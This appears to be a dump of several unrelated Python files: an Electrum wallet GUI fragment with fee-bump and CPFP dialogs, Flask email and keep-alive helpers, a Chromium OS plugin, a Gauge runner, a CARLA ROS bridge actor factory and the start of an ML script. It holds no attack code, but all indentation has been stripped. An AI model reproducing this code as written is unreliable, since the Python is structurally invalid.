header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
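# Worked example (illustrative numbers only, not from the original source):
# with fee_per_kb=5000 sat/kvB, total_size=300 vbytes and parent_fee=600 sat,
# the child fee is 5000 * 300 / 1000 - 600 = 900 sat, then clamped to at most
# max_fee and to at least total_size sat (the "1 sat/byte for combined size" floor).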
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return  # fee left empty, treat it as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
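# Illustrative note (not in the original source): if the original tx paid
# 1130 sat for 226 vbytes (5 sat/vbyte), the dialog pre-fills
# max(5 * 1.5, 5 + 1) = 7.5 sat/vbyte as the suggested new fee rate.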
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins())
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_('Cannot cancel transaction') + ': ' + _('unknown fee for original transaction'))
return
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Cancel transaction'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
except CannotDoubleSpendTx as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
email.py
|
from threading import Thread
from flask import current_app
from flask_mail import Message
from app import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body,
attachments=None, sync=False):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
if attachments:
for attachment in attachments:
msg.attach(*attachment)
if sync:
mail.send(msg)
else:
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
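# Hedged usage sketch (not part of the original module). It assumes a configured
# Flask-Mail setup and an application created by the `app` package; the config key,
# recipient address, and bodies below are placeholder values.
#
#     send_email('Password reset',
#                sender=app.config['ADMINS'][0],   # hypothetical config key
#                recipients=['user@example.com'],
#                text_body='plain-text body',
#                html_body='<p>HTML body</p>',
#                sync=False)  # False -> send on a background Thread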
|
periodic_plugin.py
|
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import threading
from cros.factory.goofy.plugins import plugin
from cros.factory.utils import debug_utils
from cros.factory.utils import process_utils
from cros.factory.utils import type_utils
class PeriodicPlugin(plugin.Plugin):
"""Plugins that runs specific task periodically.
A common implementation of `cros.factory.goofy.plugins` that run a specific
task periodically.
Subclass needs to implement `RunTask()`, which will be executed periodically
in a daemon thread.
"""
def __init__(self, goofy, period_secs,
used_resources=None, catch_exception=True):
"""Contructor of PeriodicPlugin.
Args:
period_secs: seconds between each run.
catch_exception: catch exceptions from `RunTask()` function or not. If
set to False, exception in `RunTask()` would cause the running thread
to crash, and the following periodic task would be stopped.
"""
super(PeriodicPlugin, self).__init__(goofy, used_resources)
self._thread = None
self._stop_event = threading.Event()
self._period_secs = period_secs
self._run_times = 0
self._run_task = self._RunTaskWithCatch if catch_exception else self.RunTask
@type_utils.Overrides
def OnStart(self):
self._stop_event.clear()
self._run_times = 0
self._thread = process_utils.StartDaemonThread(target=self._RunTarget)
def _RunTarget(self):
"""Periodically runs `RunTask()`."""
while not self._stop_event.wait(
self._period_secs if self._run_times else 0):
self._run_task()
self._run_times += 1
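# Note (added comment): Event.wait(0) returns immediately, so the first
# iteration runs the task right away; later iterations wait up to
# period_secs and exit the loop as soon as OnStop() sets the stop event.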
def RunTask(self):
"""Called periodically
Subclass need to implement this function.
"""
raise NotImplementedError
@debug_utils.CatchException('PeriodicPlugin')
def _RunTaskWithCatch(self):
"""Wrapper of `RunTask()` that catches any exception."""
self.RunTask()
@type_utils.Overrides
def OnStop(self):
self._stop_event.set()
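# Hedged usage sketch (not part of the original module): a minimal subclass that
# logs a heartbeat every 30 seconds. `goofy` is whatever instance the plugin
# framework passes in; the class name, interval, and `logging` usage are hypothetical.
#
#   class HeartbeatPlugin(PeriodicPlugin):
#     def __init__(self, goofy):
#       super(HeartbeatPlugin, self).__init__(goofy, period_secs=30)
#
#     def RunTask(self):
#       logging.info('heartbeat')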
|
keepalive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Ping"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
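# Hedged usage sketch (not part of the original module): running this file directly
# starts the keep-alive web server in a background thread. Host 0.0.0.0 and port 8080
# are the values hard-coded in run() above.
if __name__ == '__main__':
    keep_alive()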
|
start.py
|
import logging
import os
import platform
import sys
import threading
from concurrent import futures
from os import path
import grpc
from getgauge import connection, processor
from getgauge import lsp_server
from getgauge.impl_loader import copy_skel_files
from getgauge.messages import lsp_pb2_grpc
from getgauge.static_loader import load_files
from getgauge.util import get_step_impl_dir
PLUGIN_JSON = 'python.json'
VERSION = 'version'
def main():
_init_logger()
logging.info("Python: {}".format(platform.python_version()))
if sys.argv[1] == "--init":
copy_skel_files()
else:
load_implementations()
start()
def load_implementations():
d = get_step_impl_dir()
if path.exists(d):
load_files(d)
else:
logging.error('Cannot load implementations from {}. {} does not exist.'.format(d, d))
def start():
if os.getenv('GAUGE_LSP_GRPC'):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))
p = server.add_insecure_port('127.0.0.1:0')
handler = lsp_server.LspServerHandler(server)
lsp_pb2_grpc.add_lspServiceServicer_to_server(handler, server)
logging.info('Listening on port:{}'.format(p))
server.start()
wait_thread = threading.Thread(name="listener", target=handler.wait_till_terminated)
wait_thread.start()
wait_thread.join()
else:
s = connection.connect()
processor.dispatch_messages(s)
def _init_logger():
if os.getenv('IS_DAEMON'):
f = '%(asctime)s.%(msecs)03d %(message)s'
logging.basicConfig(stream=sys.stdout, format=f, level=logging.DEBUG, datefmt='%H:%M:%S')
else:
logging.basicConfig(stream=sys.stdout, format='%(message)s', level=logging.DEBUG)
if __name__ == '__main__':
main()
|
actor_factory.py
|
#!/usr/bin/env python
#
# Copyright (c) 2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
import itertools
try:
import queue
except ImportError:
import Queue as queue
import time
from enum import Enum
from threading import Thread, Lock
import carla
import numpy as np
import carla_common.transforms as trans
from carla_ros_bridge.actor import Actor
from carla_ros_bridge.actor_control import ActorControl
from carla_ros_bridge.actor_list_sensor import ActorListSensor
from carla_ros_bridge.camera import Camera, RgbCamera, DepthCamera, SemanticSegmentationCamera, DVSCamera, FisheyeCamera
from carla_ros_bridge.collision_sensor import CollisionSensor
from carla_ros_bridge.ego_vehicle import EgoVehicle
from carla_ros_bridge.gnss import Gnss
from carla_ros_bridge.imu import ImuSensor
from carla_ros_bridge.lane_invasion_sensor import LaneInvasionSensor
from carla_ros_bridge.lidar import Lidar, SemanticLidar
from carla_ros_bridge.marker_sensor import MarkerSensor
from carla_ros_bridge.object_sensor import ObjectSensor
from carla_ros_bridge.odom_sensor import OdometrySensor
from carla_ros_bridge.opendrive_sensor import OpenDriveSensor
from carla_ros_bridge.pseudo_actor import PseudoActor
from carla_ros_bridge.radar import Radar
from carla_ros_bridge.rss_sensor import RssSensor
from carla_ros_bridge.sensor import Sensor
from carla_ros_bridge.spectator import Spectator
from carla_ros_bridge.speedometer_sensor import SpeedometerSensor
from carla_ros_bridge.tf_sensor import TFSensor
from carla_ros_bridge.traffic import Traffic, TrafficLight
from carla_ros_bridge.traffic_lights_sensor import TrafficLightsSensor
from carla_ros_bridge.vehicle import Vehicle
from carla_ros_bridge.walker import Walker
# to generate a random spawning position for vehicles
import random
secure_random = random.SystemRandom()
class ActorFactory(object):
TIME_BETWEEN_UPDATES = 0.1
class TaskType(Enum):
SPAWN_ACTOR = 0
SPAWN_PSEUDO_ACTOR = 1
DESTROY_ACTOR = 2
def __init__(self, node, world, sync_mode=False):
self.node = node
self.world = world
self.blueprint_lib = self.world.get_blueprint_library()
self.spawn_points = self.world.get_map().get_spawn_points()
self.sync_mode = sync_mode
self._active_actors = set()
self.actors = {}
self._task_queue = queue.Queue()
self._known_actor_ids = [] # used to immediately reply to spawn_actor/destroy_actor calls
self.lock = Lock()
self.spawn_lock = Lock()
# id generator for pseudo sensors
self.id_gen = itertools.count(10000)
self.thread = Thread(target=self._update_thread)
def start(self):
# create initially existing actors
self.update_available_objects()
self.thread.start()
def _update_thread(self):
"""
execution loop for async mode actor discovery
"""
while not self.node.shutdown.is_set():
time.sleep(ActorFactory.TIME_BETWEEN_UPDATES)
self.world.wait_for_tick()
self.update_available_objects()
def update_available_objects(self):
"""
update the available actors
"""
# The carla.World.get_actors() method does not return actors that have been spawned in the same frame.
# This is a known bug and will be fixed in a future release of CARLA.
current_actors = set([actor.id for actor in self.world.get_actors()])
spawned_actors = current_actors - self._active_actors
destroyed_actors = self._active_actors - current_actors
self._active_actors = current_actors
# Create/destroy actors not managed by the bridge.
self.lock.acquire()
for actor_id in spawned_actors:
carla_actor = self.world.get_actor(actor_id)
if self.node.parameters["register_all_sensors"] or not isinstance(carla_actor, carla.Sensor):
self._create_object_from_actor(carla_actor)
for actor_id in destroyed_actors:
self._destroy_object(actor_id, delete_actor=False)
# Create/destroy objects managed by the bridge.
with self.spawn_lock:
while not self._task_queue.empty():
task = self._task_queue.get()
task_type = task[0]
actor_id, req = task[1]
if task_type == ActorFactory.TaskType.SPAWN_ACTOR and not self.node.shutdown.is_set():
carla_actor = self.world.get_actor(actor_id)
self._create_object_from_actor(carla_actor, req)
elif task_type == ActorFactory.TaskType.SPAWN_PSEUDO_ACTOR and not self.node.shutdown.is_set():
self._create_object(actor_id, req.type, req.id, req.attach_to, req.transform)
elif task_type == ActorFactory.TaskType.DESTROY_ACTOR:
self._destroy_object(actor_id, delete_actor=True)
self.lock.release()
def update_actor_states(self, frame_id, timestamp):
"""
update the state of all known actors
"""
with self.lock:
for actor_id in self.actors:
try:
self.actors[actor_id].update(frame_id, timestamp)
except RuntimeError as e:
self.node.logwarn("Update actor {}({}) failed: {}".format(
self.actors[actor_id].__class__.__name__, actor_id, e))
continue
def clear(self):
for _, actor in self.actors.items():
actor.destroy()
self.actors.clear()
def spawn_actor(self, req):
"""
spawns an object
No object instances are created here. Instead, CARLA actors are created,
and pseudo objects are queued so they can be created later.
"""
with self.spawn_lock:
if "pseudo" in req.type:
# only allow spawning pseudo objects if parent actor already exists in carla
if req.attach_to != 0:
carla_actor = self.world.get_actor(req.attach_to)
if carla_actor is None:
raise IndexError("Parent actor {} not found".format(req.attach_to))
id_ = next(self.id_gen)
self._task_queue.put((ActorFactory.TaskType.SPAWN_PSEUDO_ACTOR, (id_, req)))
else:
id_ = self._spawn_carla_actor(req)
self._task_queue.put((ActorFactory.TaskType.SPAWN_ACTOR, (id_, req)))
self._known_actor_ids.append(id_)
return id_
def destroy_actor(self, uid):
def get_objects_to_destroy(uid):
objects_to_destroy = []
if uid in self._known_actor_ids:
objects_to_destroy.append(uid)
self._known_actor_ids.remove(uid)
# remove actors that have the actor to be removed as parent.
for actor in list(self.actors.values()):
if actor.parent is not None and actor.parent.uid == uid:
objects_to_destroy.extend(get_objects_to_destroy(actor.uid))
return objects_to_destroy
with self.spawn_lock:
objects_to_destroy = set(get_objects_to_destroy(uid))
for obj in objects_to_destroy:
self._task_queue.put((ActorFactory.TaskType.DESTROY_ACTOR, (obj, None)))
return objects_to_destroy
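# Illustrative note (not in the original source): destroying a bridge-managed actor
# also queues everything attached to it, e.g. destroying a vehicle with uid 123 that
# carries a pseudo odometry sensor (uid 10000, parent=123) puts both uids on the
# DESTROY_ACTOR task queue. The uids here are made up.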
def _spawn_carla_actor(self, req):
"""
spawns an actor in carla
"""
if "*" in req.type:
blueprint = secure_random.choice(
self.blueprint_lib.filter(req.type))
else:
blueprint = self.blueprint_lib.find(req.type)
blueprint.set_attribute('role_name', req.id)
for attribute in req.attributes:
blueprint.set_attribute(attribute.key, attribute.value)
if req.random_pose is False:
transform = trans.ros_pose_to_carla_transform(req.transform)
else:
# get a random pose
transform = secure_random.choice(
self.spawn_points) if self.spawn_points else carla.Transform()
attach_to = None
if req.attach_to != 0:
attach_to = self.world.get_actor(req.attach_to)
if attach_to is None:
raise IndexError("Parent actor {} not found".format(req.attach_to))
carla_actor = self.world.spawn_actor(blueprint, transform, attach_to)
return carla_actor.id
def _create_object_from_actor(self, carla_actor, req=None):
"""
create an object for a given CARLA actor
Also creates the object for its parent, if it does not exist yet
"""
parent = None
# the transform relative to the map
relative_transform = trans.carla_transform_to_ros_pose(carla_actor.get_transform())
if carla_actor.parent:
if carla_actor.parent.id in self.actors:
parent = self.actors[carla_actor.parent.id]
else:
parent = self._create_object_from_actor(carla_actor.parent)
if req is not None:
relative_transform = req.transform
else:
# calculate relative transform to the parent
actor_transform_matrix = trans.ros_pose_to_transform_matrix(relative_transform)
parent_transform_matrix = trans.ros_pose_to_transform_matrix(
trans.carla_transform_to_ros_pose(carla_actor.parent.get_transform()))
relative_transform_matrix = np.matrix(
parent_transform_matrix).getI() * np.matrix(actor_transform_matrix)
relative_transform = trans.transform_matrix_to_ros_pose(relative_transform_matrix)
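# Added comment: relative_transform computed above is parent_matrix^-1 * actor_matrix,
# i.e. the actor's map-frame pose re-expressed in its parent's frame.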
parent_id = 0
if parent is not None:
parent_id = parent.uid
name = carla_actor.attributes.get("role_name", "")
if not name:
name = str(carla_actor.id)
obj = self._create_object(carla_actor.id, carla_actor.type_id, name,
parent_id, relative_transform, carla_actor)
return obj
def _destroy_object(self, actor_id, delete_actor):
if actor_id not in self.actors:
return
actor = self.actors[actor_id]
del self.actors[actor_id]
carla_actor = None
if isinstance(actor, Actor):
carla_actor = actor.carla_actor
actor.destroy()
if carla_actor and delete_actor:
carla_actor.destroy()
self.node.loginfo("Removed {}(id={})".format(actor.__class__.__name__, actor.uid))
def get_pseudo_sensor_types(self):
pseudo_sensors = []
for cls in PseudoActor.__subclasses__():
if cls.__name__ != "Actor":
pseudo_sensors.append(cls.get_blueprint_name())
return pseudo_sensors
def _create_object(self, uid, type_id, name, attach_to, spawn_pose, carla_actor=None):
# check that the actor is not already created.
if carla_actor is not None and carla_actor.id in self.actors:
return None
if attach_to != 0:
if attach_to not in self.actors:
raise IndexError("Parent object {} not found".format(attach_to))
parent = self.actors[attach_to]
else:
parent = None
if type_id == TFSensor.get_blueprint_name():
actor = TFSensor(uid=uid, name=name, parent=parent, node=self.node)
elif type_id == OdometrySensor.get_blueprint_name():
actor = OdometrySensor(uid=uid,
name=name,
parent=parent,
node=self.node)
elif type_id == SpeedometerSensor.get_blueprint_name():
actor = SpeedometerSensor(uid=uid,
name=name,
parent=parent,
node=self.node)
elif type_id == MarkerSensor.get_blueprint_name():
actor = MarkerSensor(uid=uid,
name=name,
parent=parent,
node=self.node,
actor_list=self.actors,
world=self.world)
elif type_id == ActorListSensor.get_blueprint_name():
actor = ActorListSensor(uid=uid,
name=name,
parent=parent,
node=self.node,
actor_list=self.actors)
elif type_id == ObjectSensor.get_blueprint_name():
actor = ObjectSensor(
uid=uid,
name=name,
parent=parent,
node=self.node,
actor_list=self.actors,
)
elif type_id == TrafficLightsSensor.get_blueprint_name():
actor = TrafficLightsSensor(
uid=uid,
name=name,
parent=parent,
node=self.node,
actor_list=self.actors,
)
elif type_id == OpenDriveSensor.get_blueprint_name():
actor = OpenDriveSensor(uid=uid,
name=name,
parent=parent,
node=self.node,
carla_map=self.world.get_map())
elif type_id == ActorControl.get_blueprint_name():
actor = ActorControl(uid=uid,
name=name,
parent=parent,
node=self.node)
elif carla_actor.type_id.startswith('traffic'):
if carla_actor.type_id == "traffic.traffic_light":
actor = TrafficLight(uid, name, parent, self.node, carla_actor)
else:
actor = Traffic(uid, name, parent, self.node, carla_actor)
elif carla_actor.type_id.startswith("vehicle"):
if carla_actor.attributes.get('role_name')\
in self.node.parameters['ego_vehicle']['role_name']:
actor = EgoVehicle(
uid, name, parent, self.node, carla_actor,
self.node._ego_vehicle_control_applied_callback)
else:
actor = Vehicle(uid, name, parent, self.node, carla_actor)
elif carla_actor.type_id.startswith("sensor"):
if carla_actor.type_id.startswith("sensor.camera"):
if carla_actor.type_id.startswith("sensor.camera.rgb"):
actor = RgbCamera(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.camera.depth"):
actor = DepthCamera(uid, name, parent, spawn_pose,
self.node, carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith(
"sensor.camera.semantic_segmentation"):
actor = SemanticSegmentationCamera(uid, name, parent,
spawn_pose, self.node,
carla_actor,
self.sync_mode)
elif carla_actor.type_id.startswith("sensor.camera.dvs"):
actor = DVSCamera(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.camera.fisheye"):
actor = FisheyeCamera(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
else:
actor = Camera(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.lidar"):
if carla_actor.type_id.endswith("sensor.lidar.ray_cast"):
actor = Lidar(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.endswith(
"sensor.lidar.ray_cast_semantic"):
actor = SemanticLidar(uid, name, parent, spawn_pose,
self.node, carla_actor,
self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.radar"):
actor = Radar(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.gnss"):
actor = Gnss(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.imu"):
actor = ImuSensor(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.collision"):
actor = CollisionSensor(uid, name, parent, spawn_pose,
self.node, carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.rss"):
actor = RssSensor(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("sensor.other.lane_invasion"):
actor = LaneInvasionSensor(uid, name, parent, spawn_pose,
self.node, carla_actor,
self.sync_mode)
else:
actor = Sensor(uid, name, parent, spawn_pose, self.node,
carla_actor, self.sync_mode)
elif carla_actor.type_id.startswith("spectator"):
actor = Spectator(uid, name, parent, self.node, carla_actor)
elif carla_actor.type_id.startswith("walker"):
actor = Walker(uid, name, parent, self.node, carla_actor)
else:
actor = Actor(uid, name, parent, self.node, carla_actor)
self.actors[actor.uid] = actor
self.node.loginfo("Created {}(id={})".format(actor.__class__.__name__, actor.uid))
return actor
|
concrete.py
|
# -*- coding: utf-8 -*-
# @Author: gunjianpan
# @Date: 2019-03-04 19:03:49
# @Last Modified by: gunjianpan
# @Last Modified time: 2019-03-28 10:26:48
import lightgbm as lgb
import numpy as np
import pandas as pd
import warnings
import threading
import time
from datetime import datetime
from numba import jit
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from util.util import *
warnings.filterwarnings('ignore')
data_path = 'concrete/data/'
model_path = 'concrete/model/'
